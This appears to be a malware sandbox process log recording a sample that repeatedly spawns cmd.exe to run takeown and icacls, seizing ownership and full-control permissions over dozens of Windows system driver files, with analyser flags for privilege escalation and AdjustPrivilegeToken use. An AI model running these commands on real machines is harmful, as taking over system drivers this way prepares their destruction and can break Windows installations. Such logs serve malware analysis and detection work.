[depth 2] C:\Windows\System32\cmd.exe (PID 3972): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\csc.sys && icacls C:\Windows\System32\drivers\csc.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3180): takeown /f C:\Windows\System32\drivers\csc.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4020): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dfsc.sys && icacls C:\Windows\System32\drivers\dfsc.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3216): takeown /f C:\Windows\System32\drivers\dfsc.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4088): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\discache.sys && icacls C:\Windows\System32\drivers\discache.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 2012): takeown /f C:\Windows\System32\drivers\discache.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3232): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\disk.sys && icacls C:\Windows\System32\drivers\disk.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 2264): takeown /f C:\Windows\System32\drivers\disk.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 2220): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Diskdump.sys && icacls C:\Windows\System32\drivers\Diskdump.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3432): takeown /f C:\Windows\System32\drivers\Diskdump.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3356): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dmvsc.sys && icacls C:\Windows\System32\drivers\dmvsc.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3496): takeown /f C:\Windows\System32\drivers\dmvsc.sys
        - Modifies file permissions
    [depth 3] C:\Windows\system32\icacls.exe (PID 3368): icacls C:\Windows\System32\drivers\dmvsc.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 3396): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmk.sys && icacls C:\Windows\System32\drivers\drmk.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 668): takeown /f C:\Windows\System32\drivers\drmk.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3456): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\drmkaud.sys && icacls C:\Windows\System32\drivers\drmkaud.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 1052): takeown /f C:\Windows\System32\drivers\drmkaud.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3540): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Dumpata.sys && icacls C:\Windows\System32\drivers\Dumpata.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 1756): takeown /f C:\Windows\System32\drivers\Dumpata.sys
        - Possible privilege escalation attempt
        - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\icacls.exe (PID 3772): icacls C:\Windows\System32\drivers\Dumpata.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 3628): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dumpfve.sys && icacls C:\Windows\System32\drivers\dumpfve.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 1516): takeown /f C:\Windows\System32\drivers\dumpfve.sys
        - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\icacls.exe (PID 3684): icacls C:\Windows\System32\drivers\dumpfve.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 3240): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxapi.sys && icacls C:\Windows\System32\drivers\dxapi.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3208): takeown /f C:\Windows\System32\drivers\dxapi.sys
        - Modifies file permissions

[depth 2] C:\Windows\System32\cmd.exe (PID 1692): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxg.sys && icacls C:\Windows\System32\drivers\dxg.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3412): takeown /f C:\Windows\System32\drivers\dxg.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 2004): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgkrnl.sys && icacls C:\Windows\System32\drivers\dxgkrnl.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4040): takeown /f C:\Windows\System32\drivers\dxgkrnl.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3692): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\dxgmms1.sys && icacls C:\Windows\System32\drivers\dxgmms1.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3900): takeown /f C:\Windows\System32\drivers\dxgmms1.sys
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 3864): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\elxstor.sys && icacls C:\Windows\System32\drivers\elxstor.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3216): takeown /f C:\Windows\System32\drivers\elxstor.sys
        - Modifies file permissions
    [depth 3] C:\Windows\system32\icacls.exe (PID 3524): icacls C:\Windows\System32\drivers\elxstor.sys /grant "Admin:F"
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 3960): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\errdev.sys && icacls C:\Windows\System32\drivers\errdev.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 2012): takeown /f C:\Windows\System32\drivers\errdev.sys
    [depth 3] C:\Windows\system32\icacls.exe (PID 3356): icacls C:\Windows\System32\drivers\errdev.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 3768): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\evbda.sys && icacls C:\Windows\System32\drivers\evbda.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3180): takeown /f C:\Windows\System32\drivers\evbda.sys
    [depth 3] C:\Windows\system32\icacls.exe (PID 3348): icacls C:\Windows\System32\drivers\evbda.sys /grant "Admin:F"
        - Modifies file permissions

[depth 2] C:\Windows\System32\cmd.exe (PID 4068): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\exfat.sys && icacls C:\Windows\System32\drivers\exfat.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 112): takeown /f C:\Windows\System32\drivers\exfat.sys
        - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\icacls.exe (PID 3324): icacls C:\Windows\System32\drivers\exfat.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 3432): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fastfat.sys && icacls C:\Windows\System32\drivers\fastfat.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 1716): takeown /f C:\Windows\System32\drivers\fastfat.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3344): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fdc.sys && icacls C:\Windows\System32\drivers\fdc.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3448): takeown /f C:\Windows\System32\drivers\fdc.sys
    [depth 3] C:\Windows\system32\icacls.exe (PID 3932): icacls C:\Windows\System32\drivers\fdc.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 3936): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fileinfo.sys && icacls C:\Windows\System32\drivers\fileinfo.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 1704): takeown /f C:\Windows\System32\drivers\fileinfo.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 2172): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\filetrace.sys && icacls C:\Windows\System32\drivers\filetrace.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3984): takeown /f C:\Windows\System32\drivers\filetrace.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 1960): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\flpydisk.sys && icacls C:\Windows\System32\drivers\flpydisk.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3336): takeown /f C:\Windows\System32\drivers\flpydisk.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3680): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fltMgr.sys && icacls C:\Windows\System32\drivers\fltMgr.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3340): takeown /f C:\Windows\System32\drivers\fltMgr.sys
        - Modifies file permissions

[depth 2] C:\Windows\System32\cmd.exe (PID 3596): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fsdepends.sys && icacls C:\Windows\System32\drivers\fsdepends.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 1336): takeown /f C:\Windows\System32\drivers\fsdepends.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3264): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fs_rec.sys && icacls C:\Windows\System32\drivers\fs_rec.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4072): takeown /f C:\Windows\System32\drivers\fs_rec.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3292): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\fvevol.sys && icacls C:\Windows\System32\drivers\fvevol.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3088): takeown /f C:\Windows\System32\drivers\fvevol.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 1908): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS && icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3088): takeown /f C:\Windows\System32\drivers\FWPKCLNT.SYS
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\icacls.exe (PID 3784): icacls C:\Windows\System32\drivers\FWPKCLNT.SYS /grant "Admin:F"
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 4060): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS && icacls C:\Windows\System32\drivers\GAGP30KX.SYS /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 1716): takeown /f C:\Windows\System32\drivers\GAGP30KX.SYS

[depth 2] C:\Windows\System32\cmd.exe (PID 3276): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gm.dls && icacls C:\Windows\System32\drivers\gm.dls /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3752): takeown /f C:\Windows\System32\drivers\gm.dls

[depth 2] C:\Windows\System32\cmd.exe (PID 3776): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\gmreadme.txt && icacls C:\Windows\System32\drivers\gmreadme.txt /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3772): takeown /f C:\Windows\System32\drivers\gmreadme.txt

[depth 2] C:\Windows\System32\cmd.exe (PID 3400): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hcw85cir.sys && icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3344): takeown /f C:\Windows\System32\drivers\hcw85cir.sys
    [depth 3] C:\Windows\system32\icacls.exe (PID 4072): icacls C:\Windows\System32\drivers\hcw85cir.sys /grant "Admin:F"
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 3340): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hdaudbus.sys && icacls C:\Windows\System32\drivers\hdaudbus.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4164): takeown /f C:\Windows\System32\drivers\hdaudbus.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3496): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HdAudio.sys && icacls C:\Windows\System32\drivers\HdAudio.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4192): takeown /f C:\Windows\System32\drivers\HdAudio.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3180): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbatt.sys && icacls C:\Windows\System32\drivers\hidbatt.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4208): takeown /f C:\Windows\System32\drivers\hidbatt.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 3760): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidbth.sys && icacls C:\Windows\System32\drivers\hidbth.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4232): takeown /f C:\Windows\System32\drivers\hidbth.sys
    [depth 3] C:\Windows\system32\icacls.exe (PID 4260): icacls C:\Windows\System32\drivers\hidbth.sys /grant "Admin:F"
        - Possible privilege escalation attempt
        - Modifies file permissions

[depth 2] C:\Windows\System32\cmd.exe (PID 3140): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidclass.sys && icacls C:\Windows\System32\drivers\hidclass.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4276): takeown /f C:\Windows\System32\drivers\hidclass.sys
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 4136): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidir.sys && icacls C:\Windows\System32\drivers\hidir.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4320): takeown /f C:\Windows\System32\drivers\hidir.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4176): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidparse.sys && icacls C:\Windows\System32\drivers\hidparse.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4360): takeown /f C:\Windows\System32\drivers\hidparse.sys
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 4240): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hidusb.sys && icacls C:\Windows\System32\drivers\hidusb.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4400): takeown /f C:\Windows\System32\drivers\hidusb.sys
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 4296): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\HpSAMD.sys && icacls C:\Windows\System32\drivers\HpSAMD.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4436): takeown /f C:\Windows\System32\drivers\HpSAMD.sys
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 4340): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\http.sys && icacls C:\Windows\System32\drivers\http.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4460): takeown /f C:\Windows\System32\drivers\http.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4380): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\hwpolicy.sys && icacls C:\Windows\System32\drivers\hwpolicy.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4520): takeown /f C:\Windows\System32\drivers\hwpolicy.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4420): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\i8042prt.sys && icacls C:\Windows\System32\drivers\i8042prt.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4568): takeown /f C:\Windows\System32\drivers\i8042prt.sys
        - Modifies file permissions

[depth 2] C:\Windows\System32\cmd.exe (PID 4472): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iaStorV.sys && icacls C:\Windows\System32\drivers\iaStorV.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4624): takeown /f C:\Windows\System32\drivers\iaStorV.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4500): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\iirsp.sys && icacls C:\Windows\System32\drivers\iirsp.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4660): takeown /f C:\Windows\System32\drivers\iirsp.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4540): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelide.sys && icacls C:\Windows\System32\drivers\intelide.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4668): takeown /f C:\Windows\System32\drivers\intelide.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4576): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\intelppm.sys && icacls C:\Windows\System32\drivers\intelppm.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4708): takeown /f C:\Windows\System32\drivers\intelppm.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4600): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipfltdrv.sys && icacls C:\Windows\System32\drivers\ipfltdrv.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4756): takeown /f C:\Windows\System32\drivers\ipfltdrv.sys
        - Modifies file permissions

[depth 2] C:\Windows\System32\cmd.exe (PID 4636): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\IPMIDrv.sys && icacls C:\Windows\System32\drivers\IPMIDrv.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4836): takeown /f C:\Windows\System32\drivers\IPMIDrv.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4688): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ipnat.sys && icacls C:\Windows\System32\drivers\ipnat.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4868): takeown /f C:\Windows\System32\drivers\ipnat.sys
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 4724): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irda.sys && icacls C:\Windows\System32\drivers\irda.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4924): takeown /f C:\Windows\System32\drivers\irda.sys
        - Possible privilege escalation attempt
        - Suspicious use of AdjustPrivilegeToken

[depth 2] C:\Windows\System32\cmd.exe (PID 4768): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\irenum.sys && icacls C:\Windows\System32\drivers\irenum.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4844): takeown /f C:\Windows\System32\drivers\irenum.sys
        - Modifies file permissions

[depth 2] C:\Windows\System32\cmd.exe (PID 4796): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\isapnp.sys && icacls C:\Windows\System32\drivers\isapnp.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4856): takeown /f C:\Windows\System32\drivers\isapnp.sys
    [depth 3] C:\Windows\system32\icacls.exe (PID 4900): icacls C:\Windows\System32\drivers\isapnp.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 4884): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdclass.sys && icacls C:\Windows\System32\drivers\kbdclass.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 5000): takeown /f C:\Windows\System32\drivers\kbdclass.sys
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 4932): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\kbdhid.sys && icacls C:\Windows\System32\drivers\kbdhid.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3540): takeown /f C:\Windows\System32\drivers\kbdhid.sys
        - Possible privilege escalation attempt
    [depth 3] C:\Windows\system32\icacls.exe (PID 4220): icacls C:\Windows\System32\drivers\kbdhid.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 4956): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ks.sys && icacls C:\Windows\System32\drivers\ks.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 5116): takeown /f C:\Windows\System32\drivers\ks.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4988): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecdd.sys && icacls C:\Windows\System32\drivers\ksecdd.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 5084): takeown /f C:\Windows\System32\drivers\ksecdd.sys
        - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\icacls.exe (PID 4196): icacls C:\Windows\System32\drivers\ksecdd.sys /grant "Admin:F"
        - Modifies file permissions

[depth 2] C:\Windows\System32\cmd.exe (PID 5032): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksecpkg.sys && icacls C:\Windows\System32\drivers\ksecpkg.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4212): takeown /f C:\Windows\System32\drivers\ksecpkg.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 5048): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ksthunk.sys && icacls C:\Windows\System32\drivers\ksthunk.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 3752): takeown /f C:\Windows\System32\drivers\ksthunk.sys
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\icacls.exe (PID 4364): icacls C:\Windows\System32\drivers\ksthunk.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 5096): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lltdio.sys && icacls C:\Windows\System32\drivers\lltdio.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 1700): takeown /f C:\Windows\System32\drivers\lltdio.sys
        - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\icacls.exe (PID 4376): icacls C:\Windows\System32\drivers\lltdio.sys /grant "Admin:F"
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 3344): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_fc.sys && icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4440): takeown /f C:\Windows\System32\drivers\lsi_fc.sys
    [depth 3] C:\Windows\system32\icacls.exe (PID 4660): icacls C:\Windows\System32\drivers\lsi_fc.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 4264): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas.sys && icacls C:\Windows\System32\drivers\lsi_sas.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4668): takeown /f C:\Windows\System32\drivers\lsi_sas.sys
        - Modifies file permissions

[depth 2] C:\Windows\System32\cmd.exe (PID 4308): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_sas2.sys && icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4908): takeown /f C:\Windows\System32\drivers\lsi_sas2.sys
        - Modifies file permissions
    [depth 3] C:\Windows\system32\icacls.exe (PID 5000): icacls C:\Windows\System32\drivers\lsi_sas2.sys /grant "Admin:F"
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 4392): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\lsi_scsi.sys && icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 5116): takeown /f C:\Windows\System32\drivers\lsi_scsi.sys
    [depth 3] C:\Windows\system32\icacls.exe (PID 4148): icacls C:\Windows\System32\drivers\lsi_scsi.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 4452): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\luafv.sys && icacls C:\Windows\System32\drivers\luafv.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4972): takeown /f C:\Windows\System32\drivers\luafv.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4616): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mcd.sys && icacls C:\Windows\System32\drivers\mcd.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 5060): takeown /f C:\Windows\System32\drivers\mcd.sys
        - Modifies file permissions
        - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\icacls.exe (PID 4236): icacls C:\Windows\System32\drivers\mcd.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 4756): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\megasas.sys && icacls C:\Windows\System32\drivers\megasas.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4900): takeown /f C:\Windows\System32\drivers\megasas.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4596): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\MegaSR.sys && icacls C:\Windows\System32\drivers\MegaSR.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4660): takeown /f C:\Windows\System32\drivers\MegaSR.sys
        - Possible privilege escalation attempt

[depth 2] C:\Windows\System32\cmd.exe (PID 4848): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\modem.sys && icacls C:\Windows\System32\drivers\modem.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4952): takeown /f C:\Windows\System32\drivers\modem.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4948): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\monitor.sys && icacls C:\Windows\System32\drivers\monitor.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4624): takeown /f C:\Windows\System32\drivers\monitor.sys
        - Suspicious use of AdjustPrivilegeToken
    [depth 3] C:\Windows\system32\icacls.exe (PID 5076): icacls C:\Windows\System32\drivers\monitor.sys /grant "Admin:F"

[depth 2] C:\Windows\System32\cmd.exe (PID 1600): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouclass.sys && icacls C:\Windows\System32\drivers\mouclass.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4972): takeown /f C:\Windows\System32\drivers\mouclass.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4524): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mouhid.sys && icacls C:\Windows\System32\drivers\mouhid.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4236): takeown /f C:\Windows\System32\drivers\mouhid.sys

[depth 2] C:\Windows\System32\cmd.exe (PID 4672): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mountmgr.sys && icacls C:\Windows\System32\drivers\mountmgr.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 4376): takeown /f C:\Windows\System32\drivers\mountmgr.sys
        - Modifies file permissions

[depth 2] C:\Windows\System32\cmd.exe (PID 5104): "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\mpio.sys && icacls C:\Windows\System32\drivers\mpio.sys /grant "%username%:F" && exit
    [depth 3] C:\Windows\system32\takeown.exe (PID 1320): takeown /f C:\Windows\System32\drivers\mpio.sys
